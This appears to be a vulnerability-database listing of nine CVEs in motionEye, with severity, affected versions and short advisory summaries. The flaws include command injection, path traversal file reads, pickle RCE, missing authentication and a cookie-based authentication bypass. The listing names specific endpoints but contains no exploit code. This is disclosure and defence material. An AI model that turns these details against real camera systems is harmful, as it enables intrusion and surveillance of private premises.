Motioneye Project Motioneye vulnerabilities
9 known vulnerabilities affecting motioneye_project/motioneye.
Total CVEs
9
CISA KEV
0
Public exploits
2
Exploited in wild
0
Severity breakdown
CRITICAL1HIGH6MEDIUM2
Vulnerabilities
Page 1 of 1
CVE-2025-60787P2HIGHCVSS 7.2PoCv0.42.1v0.43.12025-10-03
CVE-2025-60787 [HIGH] CWE-20 CVE-2025-60787: MotionEye v0.43.1b4 and before is vulnerable to OS Command Injection in configuration parameters suc
MotionEye v0.43.1b4 and before is vulnerable to OS Command Injection in configuration parameters such as image_file_name. Unsanitized user input is written to Motion configuration files, allowing remote authenticated attackers with admin access to achieve code execution when Motion is restarted.
ghsanvdosv
CVE-2022-25568P3HIGHCVSS 7.5PoC≤ 0.42.12022-03-24
CVE-2022-25568 [HIGH] CWE-1188 CVE-2022-25568: MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /c
MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured.
ghsanvdosv
CVE-2026-55488P3HIGH≥ 0, < 0.44.02026-06-23
CVE-2026-55488 [HIGH] CWE-22 motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
motionEye's Absolute Path Traversal in Media File Handlers Allows Arbitrary File Read
### Summary
mEye contains an absolute path traversal vulnerability in multiple media file handlers that allows an attacker to read arbitrary files from the filesystem.
The affected handlers accept a user-controlled filename parameter and construct filesystem paths using `os.path.join()`. When an
ghsa
CVE-2025-47782P3HIGH≥ 0.43.1b1, < 0.43.1b42025-05-15
CVE-2025-47782 [HIGH] CWE-78 motionEye vulnerable to RCE in add_camera Function Due to unsafe command execution
motionEye vulnerable to RCE in add_camera Function Due to unsafe command execution
### Summary
Using a constructed (camera) device path with the `config/add`/`add_camera` motionEye web API allows an attacker with motionEye admin user credentials to execute any UNIX shell code within a non-interactive shell as executing user of the motionEye instance, `motion` by default.
#### functio
ghsaosv
CVE-2021-44255P3HIGHCVSS 7.2fixed in 0.42.12022-01-31
CVE-2021-44255 [HIGH] CWE-306 CVE-2021-44255: Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a rem
Authenticated remote code execution in MotionEye <= 0.42.1 and MotioneEyeOS <= 20200606 allows a remote attacker to upload a configuration backup file containing a malicious python pickle file which will execute arbitrary code on the server.
ghsanvdosv
CVE-2026-31978P3MEDIUM≥ 0, < 0.44.02026-06-22
CVE-2026-31978 [MEDIUM] CWE-22 motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
motionEye has an Arbitrary File Read via Path Traversal in Picture/Movie Preview Endpoint
### Summary
motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like `/picture/{id}/preview/{filename}`. Neither the API handlers, nor the `mediafiles.py` functions like `get_media_preview()` check for `..` sequences in the filename
ghsa
CVE-2026-32315P3HIGHCVSS 7.2≥ 0, < 0.44.02026-06-22
CVE-2026-32315 [HIGH] CWE-732 motionEye's World-Readable Configuration File Exposes Admin Password Hash
motionEye's World-Readable Configuration File Exposes Admin Password Hash
# Security Advisory: World-Readable Configuration File Exposes Admin Password Hash in motionEye
## Summary
motionEye v0.43.1 and prior versions create the configuration file `/etc/motioneye/motion.conf` with `644` permissions (`-rw-r--r--`), making it readable by any local user on the system. This file contains sensit
ghsa
CVE-2026-55863MEDIUM≥ 0, < 0.44.02026-06-23
CVE-2026-55863 [MEDIUM] CWE-862 motionEye's missing authentication on ActionHandler allows unauthenticated camera action execution
motionEye's missing authentication on ActionHandler allows unauthenticated camera action execution
## Summary
The `ActionHandler.post()` method in motionEye has no authentication decorator, allowing any unauthenticated attacker to trigger camera actions including snapshots, recording start/stop, and configured action scripts (PTZ controls, alarm triggers, etc.).
#
ghsa
CVE-2026-46488CRITICAL≥ 0, < 0.44.02026-06-22
CVE-2026-46488 [CRITICAL] CWE-256 motionEye: Authentication possible via password hash
motionEye: Authentication possible via password hash
### Summary
An authentication bypass vulnerability exists due to improper trust in client-controlled cookies. The application accepts user-supplied cookie values containing a username and password-hash-derived value as sufficient authentication material. These cookies can be set or modified prior to login, allowing an unauthenticated attacker to impersonate
ghsa